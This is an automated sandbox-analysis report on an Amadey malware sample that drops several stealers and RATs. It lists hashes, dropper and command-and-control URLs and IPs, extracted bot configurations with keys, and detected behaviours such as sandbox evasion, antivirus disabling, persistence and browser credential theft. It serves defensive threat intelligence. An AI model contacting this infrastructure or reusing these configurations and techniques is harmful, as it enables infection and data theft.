amadey | 432adaeea45ba832a1df15b4d615d82967e4f0dc79371dbfafc1df922978f26e

Analysis

max time kernel
79s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250207-en
resource tags

arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
submitted
10-02-2025 18:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35f030b7d73472a67a55161a98d37678.exe
Size

2.1MB
MD5

35f030b7d73472a67a55161a98d37678
SHA1

ebf758cd48053bd9d8da9dfadce23d7c276d26e6
SHA256

432adaeea45ba832a1df15b4d615d82967e4f0dc79371dbfafc1df922978f26e
SHA512

08b4c1784a867a4b2295507c0c97f53b1f0a8e13e57515e288b922a2e359a2b0fdbbb8f1206597b8e24faba070904d9d6102737a0b5afcfc3c3f072abaeebf5d
SSDEEP

49152:4QAHYBxegdd8DPs+2lXL1+mkEA1G+GuJ5juKN:5cYBxjd8Ds+2lXLZA1GM5a

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

103.214.142.152:26264

Extracted

Family

quasar

Version

1.4.1

Botnet

githubyt

87.228.57.81:4782

Mutex

cf3988ab-2fd9-4544-a16f-9faa71eb5bac

Attributes

encryption_key
19A0FAF8459F69650B5965C225752D425C429EEC
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svchoost.exe
subdirectory
SubDir

Extracted

Family

cryptbot

http://home.fivepp5sb.top/joLepLgSzIBRhlkJbQYx17

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

lumma

https://modernakdventure.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/2624-1403-0x0000000000B20000-0x0000000000DD8000-memory.dmp	healer
behavioral2/memory/2624-1404-0x0000000000B20000-0x0000000000DD8000-memory.dmp	healer
behavioral2/memory/2624-1585-0x0000000000B20000-0x0000000000DD8000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023d7a-1527.dat	family_quasar
behavioral2/memory/2356-1540-0x0000000000B20000-0x0000000000E44000-memory.dmp	family_quasar
behavioral2/memory/3216-1579-0x0000000000B30000-0x0000000000E54000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/3124-257-0x0000000000B90000-0x000000000100E000-memory.dmp	family_sectoprat
behavioral2/memory/3124-258-0x0000000000B90000-0x000000000100E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	35f030b7d73472a67a55161a98d37678.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ViGgA8C.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
12	3808	powershell.exe
15	3808	powershell.exe
25	3808	powershell.exe
26	3808	powershell.exe
37	3808	powershell.exe
44	3808	powershell.exe
52	3808	powershell.exe
57	3808	powershell.exe
58	3808	powershell.exe
62	3808	powershell.exe
65	3808	powershell.exe
66	3808	powershell.exe
67	3808	powershell.exe
68	3808	powershell.exe
69	3808	powershell.exe
70	3808	powershell.exe
71	3808	powershell.exe
72	3808	powershell.exe
73	3808	powershell.exe
74	3808	powershell.exe
75	3808	powershell.exe
77	3808	powershell.exe
78	3808	powershell.exe
79	3808	powershell.exe
80	3808	powershell.exe
81	3808	powershell.exe
82	3808	powershell.exe
83	3808	powershell.exe
91	3808	powershell.exe
92	3808	powershell.exe
93	3808	powershell.exe
94	3808	powershell.exe
95	3808	powershell.exe
96	3808	powershell.exe
98	3808	powershell.exe
99	3808	powershell.exe
101	3808	powershell.exe
102	3808	powershell.exe
103	3808	powershell.exe
104	3808	powershell.exe
105	3808	powershell.exe
106	3808	powershell.exe
108	3808	powershell.exe
110	3808	powershell.exe
112	3808	powershell.exe
113	3808	powershell.exe
114	3808	powershell.exe
115	3808	powershell.exe
117	3808	powershell.exe
118	3808	powershell.exe
119	3808	powershell.exe
121	3808	powershell.exe
122	3808	powershell.exe
124	3808	powershell.exe
125	3808	powershell.exe
127	3808	powershell.exe
128	3808	powershell.exe
129	3808	powershell.exe
131	3808	powershell.exe
137	3808	powershell.exe
138	3808	powershell.exe
142	3808	powershell.exe
144	3808	powershell.exe
147	3808	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3124	powershell.exe
2888	powershell.exe
5052	powershell.exe
2720	powershell.exe
2572	powershell.exe
4312	powershell.exe
3500	powershell.exe
3016	powershell.exe
3656	powershell.exe
4684	powershell.exe
4348	powershell.exe
3132	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 13 IoCs

flow	pid	Process
3	4604	skotes.exe
3	4604	skotes.exe
3	4604	skotes.exe
3	4604	skotes.exe
3	4604	skotes.exe
3	4604	skotes.exe
3	4604	skotes.exe
34	968	Process not Found
145	4604	skotes.exe
145	4604	skotes.exe
145	4604	skotes.exe
145	4604	skotes.exe
133	2292	Process not Found

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 6 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3880	chrome.exe
5204	chrome.exe
5212	chrome.exe
5588	chrome.exe
6096	msedge.exe
4872	chrome.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	covxzxzipzly.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	35f030b7d73472a67a55161a98d37678.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	covxzxzipzly.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	35f030b7d73472a67a55161a98d37678.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViGgA8C.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Control Panel\International\Geo\Nation	35f030b7d73472a67a55161a98d37678.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Control Panel\International\Geo\Nation	skotes.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 9 IoCs

pid	Process
4604	skotes.exe
1648	Ryu8yUx.exe
3316	Ryu8yUx.exe
1836	skotes.exe
4472	UN8QxIq.exe
3124	ViGgA8C.exe
4624	covxzxzipzly.exe
1116	WveK4j1.exe
4736	b607327591.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Software\Wine	ViGgA8C.exe
Key opened	\REGISTRY\USER\S-1-5-21-3591594829-2464889670-1367169939-1000\Software\Wine	35f030b7d73472a67a55161a98d37678.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
211	raw.githubusercontent.com
212	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
156	api.ipify.org
157	api.ipify.org

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2828	powercfg.exe
2820	powercfg.exe
3816	powercfg.exe
2344	powercfg.exe
3416	powercfg.exe
4304	powercfg.exe
2260	powercfg.exe
3020	powercfg.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000a000000023d3c-906.dat	autoit_exe
behavioral2/files/0x0008000000023df5-1800.dat	autoit_exe
behavioral2/files/0x0008000000023e0a-1913.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	UN8QxIq.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	covxzxzipzly.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4620	35f030b7d73472a67a55161a98d37678.exe
4604	skotes.exe
1836	skotes.exe
3124	ViGgA8C.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1648 set thread context of 3316	1648	Ryu8yUx.exe	93
PID 4472 set thread context of 4444	4472	UN8QxIq.exe	127
PID 4624 set thread context of 744	4624	covxzxzipzly.exe	159
PID 4624 set thread context of 4648	4624	covxzxzipzly.exe	160
PID 4624 set thread context of 1512	4624	covxzxzipzly.exe	163

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	35f030b7d73472a67a55161a98d37678.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3804	sc.exe
2072	sc.exe
4388	sc.exe
3292	sc.exe
3288	sc.exe
4712	sc.exe
4296	sc.exe
5076	sc.exe
4596	sc.exe
4716	sc.exe
2032	sc.exe
2644	sc.exe
636	sc.exe
3636	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
424	1648	WerFault.exe	92

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	35f030b7d73472a67a55161a98d37678.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b607327591.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2044	MicrosoftEdgeUpdate.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2804	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3812	taskkill.exe
5700	taskkill.exe
5132	taskkill.exe
5796	taskkill.exe
6016	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3628	schtasks.exe
1580	schtasks.exe
5004	schtasks.exe
3532	schtasks.exe
1792	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4620	35f030b7d73472a67a55161a98d37678.exe
4620	35f030b7d73472a67a55161a98d37678.exe
4604	skotes.exe
4604	skotes.exe
2572	powershell.exe
2572	powershell.exe
3808	powershell.exe
3808	powershell.exe
3124	powershell.exe
3124	powershell.exe
3316	Ryu8yUx.exe
3316	Ryu8yUx.exe
3316	Ryu8yUx.exe
3316	Ryu8yUx.exe
1836	skotes.exe
1836	skotes.exe
3124	ViGgA8C.exe
3124	ViGgA8C.exe
4472	UN8QxIq.exe
3656	powershell.exe
3656	powershell.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4444	dialer.exe
4444	dialer.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4472	UN8QxIq.exe
4444	dialer.exe
4444	dialer.exe
4624	covxzxzipzly.exe
4684	powershell.exe
4684	powershell.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4684	powershell.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4684	powershell.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe
4444	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	3124	ViGgA8C.exe
Token: SeDebugPrivilege	4472	UN8QxIq.exe
Token: SeDebugPrivilege	4444	dialer.exe
Token: SeShutdownPrivilege	2344	powercfg.exe
Token: SeCreatePagefilePrivilege	2344	powercfg.exe
Token: SeShutdownPrivilege	3816	powercfg.exe
Token: SeCreatePagefilePrivilege	3816	powercfg.exe
Token: SeShutdownPrivilege	4304	powercfg.exe
Token: SeCreatePagefilePrivilege	4304	powercfg.exe
Token: SeShutdownPrivilege	3416	powercfg.exe
Token: SeCreatePagefilePrivilege	3416	powercfg.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4624	covxzxzipzly.exe
Token: SeDebugPrivilege	744	dialer.exe
Token: SeShutdownPrivilege	2260	powercfg.exe
Token: SeCreatePagefilePrivilege	2260	powercfg.exe
Token: SeLockMemoryPrivilege	1512	dialer.exe
Token: SeShutdownPrivilege	2820	powercfg.exe
Token: SeCreatePagefilePrivilege	2820	powercfg.exe
Token: SeShutdownPrivilege	3020	powercfg.exe
Token: SeCreatePagefilePrivilege	3020	powercfg.exe
Token: SeShutdownPrivilege	2828	powercfg.exe
Token: SeCreatePagefilePrivilege	2828	powercfg.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeAssignPrimaryTokenPrivilege	1076	svchost.exe
Token: SeIncreaseQuotaPrivilege	1076	svchost.exe
Token: SeSecurityPrivilege	1076	svchost.exe
Token: SeTakeOwnershipPrivilege	1076	svchost.exe
Token: SeLoadDriverPrivilege	1076	svchost.exe
Token: SeSystemtimePrivilege	1076	svchost.exe
Token: SeBackupPrivilege	1076	svchost.exe
Token: SeRestorePrivilege	1076	svchost.exe
Token: SeShutdownPrivilege	1076	svchost.exe
Token: SeSystemEnvironmentPrivilege	1076	svchost.exe
Token: SeUndockPrivilege	1076	svchost.exe
Token: SeManageVolumePrivilege	1076	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1076	svchost.exe
Token: SeIncreaseQuotaPrivilege	1076	svchost.exe
Token: SeSecurityPrivilege	1076	svchost.exe
Token: SeTakeOwnershipPrivilege	1076	svchost.exe
Token: SeLoadDriverPrivilege	1076	svchost.exe
Token: SeSystemtimePrivilege	1076	svchost.exe
Token: SeBackupPrivilege	1076	svchost.exe
Token: SeRestorePrivilege	1076	svchost.exe
Token: SeShutdownPrivilege	1076	svchost.exe
Token: SeSystemEnvironmentPrivilege	1076	svchost.exe
Token: SeUndockPrivilege	1076	svchost.exe
Token: SeManageVolumePrivilege	1076	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1076	svchost.exe
Token: SeIncreaseQuotaPrivilege	1076	svchost.exe
Token: SeSecurityPrivilege	1076	svchost.exe
Token: SeTakeOwnershipPrivilege	1076	svchost.exe
Token: SeLoadDriverPrivilege	1076	svchost.exe
Token: SeSystemtimePrivilege	1076	svchost.exe
Token: SeBackupPrivilege	1076	svchost.exe
Token: SeRestorePrivilege	1076	svchost.exe
Token: SeShutdownPrivilege	1076	svchost.exe
Token: SeSystemEnvironmentPrivilege	1076	svchost.exe
Token: SeUndockPrivilege	1076	svchost.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
4620	35f030b7d73472a67a55161a98d37678.exe
4736	b607327591.exe
3504	Explorer.EXE
3504	Explorer.EXE
4736	b607327591.exe
4736	b607327591.exe
3504	Explorer.EXE
3504	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4736	b607327591.exe
4736	b607327591.exe
4736	b607327591.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4620 wrote to memory of 4604	4620	35f030b7d73472a67a55161a98d37678.exe	85
PID 4620 wrote to memory of 4604	4620	35f030b7d73472a67a55161a98d37678.exe	85
PID 4620 wrote to memory of 4604	4620	35f030b7d73472a67a55161a98d37678.exe	85
PID 4604 wrote to memory of 2572	4604	skotes.exe	86
PID 4604 wrote to memory of 2572	4604	skotes.exe	86
PID 4604 wrote to memory of 2572	4604	skotes.exe	86
PID 2572 wrote to memory of 4484	2572	powershell.exe	88
PID 2572 wrote to memory of 4484	2572	powershell.exe	88
PID 2572 wrote to memory of 4484	2572	powershell.exe	88
PID 4484 wrote to memory of 1912	4484	cmd.exe	90
PID 4484 wrote to memory of 1912	4484	cmd.exe	90
PID 4484 wrote to memory of 1912	4484	cmd.exe	90
PID 4484 wrote to memory of 3808	4484	cmd.exe	91
PID 4484 wrote to memory of 3808	4484	cmd.exe	91
PID 4484 wrote to memory of 3808	4484	cmd.exe	91
PID 4604 wrote to memory of 1648	4604	skotes.exe	92
PID 4604 wrote to memory of 1648	4604	skotes.exe	92
PID 4604 wrote to memory of 1648	4604	skotes.exe	92
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
